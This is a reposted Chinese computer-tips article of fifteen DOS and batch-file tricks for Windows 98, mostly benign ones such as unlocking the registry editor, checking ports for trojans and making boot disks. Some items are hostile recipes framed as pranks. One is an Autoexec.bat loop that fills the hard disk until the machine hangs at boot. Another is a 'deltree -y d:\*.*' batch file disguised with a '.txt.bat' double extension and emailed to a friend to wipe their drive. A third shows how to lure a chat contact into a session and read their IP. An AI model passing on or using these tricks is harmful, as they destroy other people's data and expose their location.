·站点首页 
·常用软件
·站内留言
 您现在的位置: 电脑医院 >> 站点首页 >> 软件技巧 >> 初涉电脑 >> 正文  
  DOS利用全接触         
DOS利用全接触
[ 作者:佚名    转贴自:本站论坛    点击数:3532    更新时间:2004-07-14    文章录入:凌松
一、给非法用户设置个小陷阱

在Windows目录中建立一个winstart.bat文件(如果已经存在该文件,则按如下所示修改其内容),并在该文件中加入以下几行命令:
@echooff
choice/c:&/n/3

上面代码中的“&”为我们设置的密码,可以自行设置。这样,在启动Windows时系统将要求你输入密码,表现在屏幕上就是光标一闪一闪的,造成非法用户以为Windows死机的假像,有时,就连部分高手也会上当受骗。当我们要进入系统时,只要输入“&”即可

二、用“魔咒”跟电脑开个玩笑

怎样让电脑死机呢?当然有很多方法,这里介绍一种非常简单的方法。打开C盘根目录下的Autoexec.bat文件(如果不存在,可以自行建立),然后将其中的内容全部删除,输入下面两行命令:
@cd>>notepad
@%0
然后保存就可以了。解释一下上面的命令:
“@”符号表示在DOS下不显示后面的命令,这样就可以把危险指令掩藏起来,来个神不知鬼不觉。“cd>>notepad’就是把当前的目录拷贝成一个名为notepad的文件,“>>”表示保存到,和“>”不同的是,“>>”会将保存结果加到文件的最后,而“>”是覆盖的意思。所以,用“>>”的结果就是保存的文件越来越大!“%0”的意思是不断地重复上面一条指令,其结果就是名为notepad的文件会越来越大,直到填满整个硬盘,此时,你的电脑就只有死机一条路可以走了。如果你重新启动电脑,只会看到;Starting MS-DOS...之后就会死机了,而且期间会不接受任何指令。要去掉这条“魔咒”,只要用软盘启动电脑,或跳过Autoexec.bat文件的执行,再把上面的指令去掉就行了。


三、在DOS下解锁注册表编辑器

大家知道,注册表编辑器被禁用后很是棘手,特别是reg文件打开方式被更改后,就无法通过导入reg文件来解锁注册表了。不过,在DOS下我们也可以给注册表解锁,具体方法是:在纯DOS下,输入如下命令:REGEDIT/DHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools。回车,会出现一个标题栏为“注册表编辑器”的对话框,里面写着“,确实要把HKEY_CURRENT_USER\......DisableRegistryTools内的信息添加到注册表吗?”点击“确定”即可。浏览恶意网页导致注册表被禁用后,不妨试试本方法。

四、用Doskey命令“封杀”format

对格式化程序~rmat命令大家一定很害怕吧?某些病毒一侵入,就给你的硬盘来个格式化,后悔都来不及,只得重装系统,不仅麻烦,而且资料不保!现在你不必害怕了,在DOS下键入如下命令:C:\doskeyformAT=BadCommandOrfilename!回车,就将format命令给“封杀”了,当病毒或恶意程序格式化你的硬盘时,系统将会显示:BadcommandOrfilename!如果你自己想格式化,怎么办呢?可以在DOS下键入如下命令:C:\doskeyformAT=,然后回车就可以了。注:Doskey为DOS提供的锁定命令。

五、在DOS下检查是否中木马

一般说来,中了木马的机器会开有特定的端口。一般一台个人用的Win9x系统在开机后最多只有137、138、139这3个端口(若上网冲浪会有其他端口,这是本机与网上主机通讯时打开的,如IE会打开1025、1026、1027……,QQ会打开4000、4001……)。由于Netstat命令是通过读取内存中的“kernelroutingtables”来获得网络信息,所以用它来发现一般的木马还是很容易的。在DOS命令行下用netstat-na命令可以看到本机所有打开的连接,如:

C:\WINDOWS>nelstat-na
ActiveCofmectiogs
ProtoLocalAddressForeignAddressState
TCPXXX.XXX.XXX.XXX:1370.0.0.0:0LISTENING
TCPXXX.XXX.XXX.XXX:1380.0.0.0:0LISTENING
TCPXXX.XXX.XXX.XXX:1390.0.0.0:0LISTENING
UDPXXX.XXX.XXX.XXX:137*:*
UDPXXX.XXX.XXX.XXX:138*:*

发现有其他端口打开的话就要查查看子,你很有可能中木马了。怎么样?在DOS下也可以检查是否中木马了,很棒吧!

六、在DOS下打开1E的“1nlernet属性”窗口

有时在浏览了某些恶意网页后,会导致IE的“Internet属性”对话框无法打开,这时我们可以在DOS窗口下输入:RunDll32.exeshell32.dll,ControlRunDLLinetcpl.cpl命令,就可打开IE的“Internet属性”对话框。要注意“ControlRunDLL”的大小写以及它前面的逗号(,)不要忘记了。

七、在DOS下使用注册表编辑器

注册表编辑器Regedit.exe其实是一个双栖型的程序,即可在Windows下运行,也可在DOS下运行。许多用户可能已经知道在Windows下使用Regedit的方法,那么在DOS下如何使用注册表编辑器呢?

在DOS提示符下键入Regedit命令,将出现一个帮助屏幕。此屏幕给出了其命令行参数及其使用方法。

语法:
Regedit[/L:system][/R:user]filenamel
Regedit[/L:system][/R:user]/Cfilename2
Regedit[/L:system][/R:userl/Efilename3
[regpath]

其中;
/L:system指定system.dat文件的存放位置。
/L:user指定user.dat文件的存放位置。
filenamel指定引入注册表数据库的文件名。
/Cfilename2指定形成注册表数据库的文件名。参数“/C”表示从后面指定的文件中重新生成整个注册表。重建的注册表文件往往比原来的小l/5到1/3,从而达到了优化的目的。
/Efilename3指定导出注册表文件的文件名。
regpath指定导出注册表文件的开始关键字(缺省为全部关键字)
现举几个例子说明regedit.exe在DOS下的使用方法。

[例1]将注册表导出到reg1.reg文件中。
regedit/Ereg1.reg
[例2]重新生成注册表reg1.reg。
regedit/Creg1.reg
[例3]将reg.dat导人系统注册表数据库中。
regeditreg.dat
[例4]将CLK开始的关键字导出注册表数据库,并命名为clk.reg。
regedit/Eclk.regclk
[例5]指定system.dat存放在D:\PIN中,将user.dat存放在E:\PWIN中,将reg.dat数据文件形成一个新的注册表数据库。
regecht/L:D:\PWIN/R:E:\PWIN/Creg.Dat

八、用DOS命令查QQ好友的1P地址

查QQ好友的IP地址还用得着这么麻烦吗?给QQ打个补丁不就行了吗?不错,这样做是很简单,但如果是新出的QQ,“补丁”还没有做出来,又该怎么办呢?为什么不试试DOS命令呢?即简单,又方便。

首先,用甜言蜜语、糖衣炮弹之类的武器把你想知道IP地址的那个人“请”到QQ的“二人世界”里。接着,我们在DOS窗口(Win9x下叫DOS,Win2000下叫命令提示符),输入如下命令:netstat-n
你将看到:

ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555ESTABLISHED
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED

好家伙,这么多IP!那个才是我们要找的呢?别着急,往后看。我们现在推出“二人世界”,然后在DOS下再输入一次:netstat-n

你将看到:
ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555TIME_WAIT
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED

看出前后两次的区别了么?没有看出来?仔细看看,你会发现的。现在你知道了吧?对!和你聊天的人的IP就是202.121.139.35!你是怎么知道的呢?我们在“二人世界”中要传送消息,相互之间必然要通过UDP协议产生连接,此时自然是ESTABLISHED了;而退出“二人世界”连接要断开,自然就是TIME_WAIT了。

九、自动加载防火墙

有些朋友在上网时常忘记运行防火墙,病毒或木马之类的程序就有可能乘虚而入!但是,如果每次启动WINDOWS都自动启动防火墙,由于不是每次开机都上网,因此有浪费系统资源之嫌。那么,有没有两全其美的方法呢? 由于我们上网往往要发电子邮件,因此,如果能在收发邮件时自动打开防火墙,不就解决了这个问题么?下面以天网防火墙和OUTLOOKEXPRESS为例,说说如何在邮件客户端运行之前打开防火墙。

首先新建一个文本文件,在其中输入以下内容:
STARTC:\PROGRA~1\SKYNET\FIREWALL\SNFW.EXE
STARTC:\PROGRA~1\OUTLOO~1,EXE\MSIMN.EXE
然后另存为GO.BAT即可(名字随便起,只要是后缀为BAT就可以了)。由于OUTLOOKEXPRESS默认设置为启动时发送和接受邮件,只要我们执行GO.BAT,他就会自动启动天网防火墙,接着就会启动OE,OE就会连线上网,如此达到了上网即可打开防火墙的目的。这里需要指出的是:DOS下不支持长文件名,最多8个字符,所以ProgramFiles应写成Progra~!,命令格式即为“start文件存放路径”。

十、删除不必要的文件

在Windows下保存着许多我们并个需要的文件,如Temp目录和Rcenet目录下的文件,回收站中的文件以及IE的历史记录和Cookie等丈仆,如果手工来清除它们实在是太麻烦了,我们可以在Autoexec.bat中加入一些内容,使得每次启动Windows时就删除这些文件,这样就省事多了!用记事本打开C:\Autoexec.bat文件,编辑内容如下:

EchoY
ifexistc:\windows\temp\*.*delc:\windows\temp\*.*>nul
ifexistc:\windows\Tempor~1\*.*delc:\windows\Tempor~1\*.*>nul
ifexistc:\windows\History\*.*delc:\windows\History\*.*>nul
ifexistc:\windows\recent\*.*delc:\windows\recent\*.*>nul
ifexistc:\windows\cookies\*.*delc:\windows\cookies\*.*>nul

此批处理第二行为删除临时文件夹的内容;第三、四行为删除IE浏览器打开网页后遗留下的内容;第五行为删除“开始”→“文档”中的内容;第六行为删除回收站里的内容;第六行为删除Cookies。

十一、更改指定文件的日期

要修改名为XXX.exe(任意exe文件)的日期,可以在MS—DOS方式下键入copyXXX.exe+,,(注:加号后紧跟2个逗号),系统询问时键入“Y”,即将文件更改为当前日期。

十二、恢复在DOS下删除的文件

Windows98的回收站只能恢复在Windows里删除的内容,用以下方法可恢复Windows98的DOS模式下删除的文件:先运行“Lock”命令,解除WindOWS对磁盘访问的限制,再使用命令“UnDelete”恢复。或重新启动进入DOS,运行“UnDelete”也行,不过动作要快,否则被其他新建文件覆盖了就没有办法了。

十三、在DOS下制作启动盘

当Windows98系统崩溃而你又不得不重装系统的时候,如果伯;以前忘了制作启动盘,那么不要着急,这时还可以在DOS环境下制作。具体方法是:运行Windows目录下的Command文件夹中的一个名为Bootdisk的批处理文件。运行后出现下列信息:

Pleasespecifythedriveletterofyourfloopydrive.
PresslforAOr
Press2forB:
Chooseanoption[1,2]?

一般都选择1,之后屏幕会出现—些英文信息。放入一张磁盘后,按回车,…张启动盘很快就制作成了。

十四、DOS中的注册表修理命令

在DOS状态下,输入命令行“Scanreg/fix,系统会对当前的注册表进行修复,如果你觉得系统有些不正常,试试这个命令吧,也许能解决问题。

十五、和朋友开个玩笑

这是个危险的游戏,切记:只有真心想让朋友痛揍一顿的人才可以使用!
用记事本编辑一个文本文件,里面只有一句:
deltree-yd:\*.*,然后另存为“我的文章.txt.bat’
用E-mail附件发送给他。由于Windows支持双后缀名,这样,
在你的朋友看来这个文件就是:我的文章.txt。
谁又知道这是个批处理文件呢?如果他双击这篇所谓的“文章”,
那他D盘下的文件就不保了。防范方法:不要随便打开附件,如果实在想看,一定要用记事本打开。将系统中的危险命令删除或改名。另外,让系统能显示双重扩展名,在“资源管理器”中点击“查看(v)”→“文件夹选项”→“查看”,将“隐藏已知文件类型的扩展名”前面的“√”去掉。
再次声明:这样做是很危险的!虽然这算不上病毒,但它们的危害有时比病毒还要大。

[1]

  • 上一篇文章: DOS常用命令

  • 下一篇文章: 笔记本电脑硬件详解内存篇
  • 发表评论】【告诉好友】【打印此文】【关闭窗口
     最新5篇热点文章
  • Haswell i7/i5处理器、8系…[3728]

  • Windows 8获得完整管理员权…[16454]

  • Windows 8 各版本区别[3286]

  • 用于Windows 7的Internet …[3535]

  • Microsoft Office 2013专业…[3594]

  •  
     最新5篇推荐文章
  • "保存"自动恢复"文件因Nor…[18843]

  • 10月21日微软最新OFFICE正…[8909]

  • 金九银十优惠多 笔记本打折…[5775]

  • 金九银十优惠多 笔记本打折…[5998]

  • 金九银十优惠多 笔记本打折…[5635]

  •  
     相 关 文 章
  • 用微软官方命令 Vista免费…[2760]

  • DOS常用命令[6081]

  • 开始→运行→命令集锦[2663]


  •   网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
        没有任何评论
    设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 
    版权所有 Copyright© 2002-2019 电脑医院        站长:Smart001        页面执行时间:62.50毫秒   粤ICP备10066699号